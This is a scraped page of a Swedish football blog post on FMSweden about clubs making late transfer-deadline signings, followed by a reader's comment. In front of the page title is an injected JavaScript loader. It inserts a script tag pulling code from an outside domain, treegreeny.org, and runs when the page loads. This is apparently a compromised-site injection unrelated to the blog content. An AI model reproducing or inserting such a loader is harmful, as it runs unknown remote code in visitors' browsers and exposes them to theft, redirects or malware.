;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Vänta till sista sekund – FMSweden
Meny Stäng

Fabbes blogg: Vänta till sista sekund

Silly Season är över och det längsta transferfönstret någonsin är stängt. Ändå kändes det som vi hade rekordmånga övergångar sista timmarna. Vad är det som gör att klubbarna väntar till sista sekund?

Vi har sett det gång på gång, klubbar som i panik värvar ett halvt nytt lag på transferfönstrets sista dag. Under måndagskvällen stack flertalet klubbar ut med sina värvningar, där Manchester United var allra mest aktiva med fyra nyförvärv. Frågan är vad det är som gör att klubbarna väntar till absolut sista timmarna på transferfönstret innan man förstärker laget? Är det en förhandlingstaktik för att få ner lönekraven? Är det en desperat åtgärd för att man inte levererat det inledande matcherna? Eller är det bara ett tecken på att klubbarna styrs på ett sätt som ingen någonsin kommer förstå? Jag har inga svar på frågorna, men faktum är att det varje år är samma visa, och vissa klubbar känns nästan desperata när de tar in någon gammal avdankad högerytter på lån med köpoption klockan 23.58.

Var dock en hel del roliga övergångar som skedde. Tror till skillnad från många på Twitter att Cavani kan bli bra i Manchester United, och att Robin Olsen hamnade i Everton var ju också en oväntad med rolig övergång. Sen om han kommer få chansen att konkurrera med Pickford, eller enbart är tänk att värma bänk låter jag vara osagt, men kul chans hur som helst. Vilka ser ni som deadline-days bästa och roligaste värvningar?

————————————

Fram till den 15 oktober kan dock klubbarna i Premier League och Championship göra övergångar med varandra. Räkna med att några klubbar kommer försöka göra sig av med dödkött så gott det går hela vägen fram.

————————————

Det var allt för den här veckan. Kommentera gärna med era åsikter!

Ciao

Please wait...

Liknande Inlägg

1 kommentar

  1. Micke

    Kloka tankar Fabian! Som Unitedsupporter var man ju ganska frustrerad under deadline day. Kändes som att de blev desperata mot slutet när de inte kunde lösa Sancho och istället värvade in två unga yttrar. Cavani är ju bra, men en kortsiktig lösning. Telles har jag sett för lite men skönt att få in en vänsterback iaf.

Lämna ett svar